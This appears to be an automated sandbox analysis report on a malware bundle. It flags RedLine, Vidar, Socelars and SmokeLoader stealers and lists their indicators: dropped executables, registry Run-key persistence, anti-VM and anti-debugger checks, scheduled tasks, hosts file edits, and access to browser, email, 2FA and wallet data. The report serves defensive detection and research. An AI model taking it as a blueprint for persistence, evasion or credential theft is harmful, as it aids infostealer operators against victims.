redline | c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19

Change Default File Association

T1042

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	508	4040	rundll32.exe	22
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	968	4040	rundll32.exe	22
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8048	4040	rundll32.exe	22

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral10/memory/1848-215-0x00000000048A0000-0x00000000048BF000-memory.dmp	family_redline
behavioral10/memory/1848-220-0x0000000004A30000-0x0000000004A4E000-memory.dmp	family_redline
behavioral10/memory/5792-454-0x000000000041C5EE-mapping.dmp	family_redline

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral10/files/0x000600000001ab48-164.dat	family_socelars
behavioral10/files/0x000600000001ab48-150.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2748 created 1868	2748	WerFault.exe	108
PID 2972 created 4452	2972	WerFault.exe	95

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 7124 created 8132	7124	svchost.exe	413

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

rl_trojan 1 IoCs

redline stealer.

stealer

resource	yara_rule
behavioral10/memory/5208-457-0x00000000053D0000-0x00000000058CE000-memory.dmp	redline

Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral10/memory/4420-212-0x00000000034B0000-0x0000000003581000-memory.dmp	family_vidar
behavioral10/memory/4420-242-0x0000000000400000-0x00000000017F2000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral10/files/0x000400000001ab2b-124.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab2b-125.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab2c-123.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab2c-128.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab2e-129.dat	aspack_v212_v242
behavioral10/files/0x000400000001ab2e-130.dat	aspack_v212_v242

Blocklisted process makes network request 51 IoCs

flow	pid	Process
207	7152	MsiExec.exe
212	7152	MsiExec.exe
215	7152	MsiExec.exe
217	7152	MsiExec.exe
219	7152	MsiExec.exe
221	7152	MsiExec.exe
222	7152	MsiExec.exe
223	7152	MsiExec.exe
224	7152	MsiExec.exe
226	7152	MsiExec.exe
227	7152	MsiExec.exe
228	7152	MsiExec.exe
229	7152	MsiExec.exe
230	7152	MsiExec.exe
231	7152	MsiExec.exe
232	7152	MsiExec.exe
233	7152	MsiExec.exe
235	7152	MsiExec.exe
237	7152	MsiExec.exe
238	7152	MsiExec.exe
240	7152	MsiExec.exe
241	7152	MsiExec.exe
243	7152	MsiExec.exe
244	7152	MsiExec.exe
245	7152	MsiExec.exe
250	7152	MsiExec.exe
251	7152	MsiExec.exe
58	1036	schtasks.exe
252	7152	MsiExec.exe
253	7152	MsiExec.exe
254	7152	MsiExec.exe
255	7152	MsiExec.exe
256	7152	MsiExec.exe
257	7152	MsiExec.exe
258	7152	MsiExec.exe
259	7152	MsiExec.exe
261	7152	MsiExec.exe
262	7152	MsiExec.exe
264	7152	MsiExec.exe
265	7152	MsiExec.exe
266	7152	MsiExec.exe
267	7152	MsiExec.exe
268	7152	MsiExec.exe
269	7152	MsiExec.exe
270	7152	MsiExec.exe
273	7152	MsiExec.exe
274	7152	MsiExec.exe
275	7152	MsiExec.exe
276	7152	MsiExec.exe
78	1456	schtasks.exe
355	4332	rundll32.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	46807GHF____.exe

Executes dropped EXE 64 IoCs

pid	Process
4920	setup_installer.exe
5016	setup_install.exe
3560	Sun05640630a6aa.exe
4236	Sun050462125c7d35.exe
740	Sun05d60bc3b96248e5.exe
3288	Sun05899db881f67fb29.exe
1848	Sun052bbd8bebd9.exe
2216	Sun05532f7abc.exe
4420	Sun05ac1b0207d3ff3b8.exe
1788	WerFault.exe
4452	Sun05fa3b4d2ae56e.exe
4404	Sun054fe19a12cb3.exe
3872	Sun054fe19a12cb3.tmp
4804	LzmwAqmV.exe
5084	4402665.exe
5088	Chrome 5.exe
684	1860007.exe
972	46807GHF____.exe
1352	PublicDwlBrowser1100.exe
3548	2.exe
1868	setup.exe
2108	udptest.exe
4488	Conhost.exe
4444	WinHoster.exe
5000	3002.exe
2896	setup_2.tmp
4292	jhuuee.exe
4436	BearVpn 3.exe
1456	133519.exe
1536	setup_2.exe
4536	3002.exe
2648	setup_2.tmp
1036	3733924.exe
3436	3307456.exe
3728	2967757.exe
5208	6937945.exe
5572	1949358.exe
5648	2880988.exe
5792	6937945.exe
4728	Conhost.exe
3684	ultramediaburner.exe
5476	ultramediaburner.tmp
5936	Rulidakupy.exe
5268	UltraMediaBurner.exe
4440	Fokifyfulo.exe
3688	services64.exe
6220	GcleanerEU.exe
6444	installer.exe
6780	anyname.exe
6852	BsInstFile.exe
7112	askinstall52.exe
4172	reg.exe
3872	5077757.exe
6328	8057540.exe
6932	3098340.exe
2128	4990988.exe
7040	install.exe
6720	SimplInst.exe
7216	SimplInst.exe
7424	gcleaner.exe
7452	C3KHKEn~m73GVLA.exE
7524	sihost64.exe
4224	48C2.exe
6164	57D6.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	133519.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8057540.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3098340.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3098340.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	B98.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	133519.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8057540.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	B98.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Rulidakupy.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	UbmPrUN.exe

Loads dropped DLL 52 IoCs

pid	Process
5016	setup_install.exe
5016	setup_install.exe
5016	setup_install.exe
5016	setup_install.exe
5016	setup_install.exe
3872	5077757.exe
2896	setup_2.tmp
2648	setup_2.tmp
4700	Conhost.exe
5228	rundll32.exe
4028	rundll32.exe
4420	Sun05ac1b0207d3ff3b8.exe
4420	Sun05ac1b0207d3ff3b8.exe
6444	installer.exe
6444	installer.exe
6444	installer.exe
6268	MsiExec.exe
6268	MsiExec.exe
8060	rundll32.exe
8176	rundll32.exe
7152	MsiExec.exe
7152	MsiExec.exe
7152	MsiExec.exe
7152	MsiExec.exe
7152	MsiExec.exe
7152	MsiExec.exe
7152	MsiExec.exe
7152	MsiExec.exe
7152	MsiExec.exe
7152	MsiExec.exe
6444	installer.exe
7152	MsiExec.exe
7152	MsiExec.exe
8048	MsiExec.exe
8048	MsiExec.exe
8048	MsiExec.exe
8048	MsiExec.exe
8048	MsiExec.exe
8048	MsiExec.exe
8048	MsiExec.exe
7152	MsiExec.exe
7868	CF78.exe
7868	CF78.exe
7868	CF78.exe
7868	CF78.exe
7868	CF78.exe
4332	rundll32.exe
3456	FileSyncConfig.exe
3456	FileSyncConfig.exe
3456	FileSyncConfig.exe
3456	FileSyncConfig.exe
3456	FileSyncConfig.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1860007.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Common Files\\Caelacedunae.exe\""	46807GHF____.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""	OneDriveSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	133519.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8057540.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3098340.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	B98.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	UbmPrUN.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\Q:	installer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
89	ip-api.com

Drops file in System32 directory 58 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 09A04C3522BE8FAF	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	UbmPrUN.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6	UbmPrUN.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File opened for modification	C:\Windows\System32\Tasks\bCQQUSYoXLKlZTQVFm	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	UbmPrUN.exe
File opened for modification	C:\Windows\System32\Tasks\gBAQvvrnh	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	UbmPrUN.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	UbmPrUN.exe
File opened for modification	C:\Windows\System32\Tasks\MpGuFfBVdJflLk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\ZoXPCQOixILhL2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\TSZDlHjZcujaNcgsj2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\JWccChrZepOVqMLId	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\hxUIoduwsSkQKnehv	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\TXAwOSJqerYTzUX	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2543B5AF7D46D42E6CEED21F85143F6A_DD661F9918408D0BD7983B98C8E1792C	UbmPrUN.exe
File opened for modification	C:\Windows\System32\Tasks\spuyhAIOUfZM	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	UbmPrUN.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27	UbmPrUN.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	UbmPrUN.exe
File opened for modification	C:\Windows\System32\Tasks\NrvtNKuORviNiFRYXGZ2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	UbmPrUN.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	UbmPrUN.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90}	svchost.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	KXOTaKB.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27	UbmPrUN.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2543B5AF7D46D42E6CEED21F85143F6A_DD661F9918408D0BD7983B98C8E1792C	UbmPrUN.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\gBumTvfjY	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6	UbmPrUN.exe
File opened for modification	C:\Windows\System32\Tasks\TXAwOSJqerYTzUX2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	KXOTaKB.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	UbmPrUN.exe
File opened for modification	C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1456	133519.exe
6328	8057540.exe
6932	3098340.exe
8008	B98.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2684 set thread context of 4576	2684	svchost.exe	133
PID 5208 set thread context of 5792	5208	6937945.exe	147
PID 3688 set thread context of 8128	3688	services64.exe	277

Drops file in Program Files directory 32 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\AfNWPhScxyylC\iSLzFjn.dll	UbmPrUN.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-C5QEH.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	UbmPrUN.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	UbmPrUN.exe
File created	C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\yEHMdln.xml	UbmPrUN.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-PHMC1.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi	UbmPrUN.exe
File created	C:\Program Files (x86)\CaOqiYMiQPmU2\owlTstnnqclsP.dll	UbmPrUN.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\CaOqiYMiQPmU2\CYTqTeQ.xml	UbmPrUN.exe
File created	C:\Program Files (x86)\FarLabUninstaller\is-GDUUI.tmp	setup_2.tmp
File created	C:\Program Files (x86)\Common Files\Caelacedunae.exe	46807GHF____.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe	46807GHF____.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files (x86)\YSFbCTIaU\wTtncs.dll	UbmPrUN.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi	UbmPrUN.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	UbmPrUN.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Common Files\Caelacedunae.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File created	C:\Program Files (x86)\AfNWPhScxyylC\uhXvvFg.xml	UbmPrUN.exe
File created	C:\Program Files (x86)\HpvPjMDmaiUn\yixiKzR.dll	UbmPrUN.exe
File created	C:\Program Files\Windows Photo Viewer\JTSSYWMJLN\ultramediaburner.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\YSFbCTIaU\EcEMsvt.xml	UbmPrUN.exe
File created	C:\Program Files (x86)\ACOkaPyEHSjbvhvMaqR\ImouUmS.dll	UbmPrUN.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp

Drops file in Windows directory 55 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI1DF9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4661.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Tasks\hxUIoduwsSkQKnehv.job	schtasks.exe
File created	C:\Windows\Installer\f751c85.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4BB3.tmp	msiexec.exe
File opened for modification	C:\Windows\Tasks\TXAwOSJqerYTzUX.job	svchost.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI36F7.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\Tasks\bCQQUSYoXLKlZTQVFm.job	schtasks.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4257.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5490.tmp	msiexec.exe
File created	C:\Windows\Installer\f751c82.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1F72.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1FC2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4CED.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI35ED.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI44AA.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI3785.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI39DA.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\f751c82.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2020.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Tasks\bCQQUSYoXLKlZTQVFm.job	svchost.exe
File opened for modification	C:\Windows\Tasks\hxUIoduwsSkQKnehv.job	svchost.exe
File opened for modification	C:\Windows\Installer\MSI2060.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI389F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1F32.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI39B9.tmp	msiexec.exe
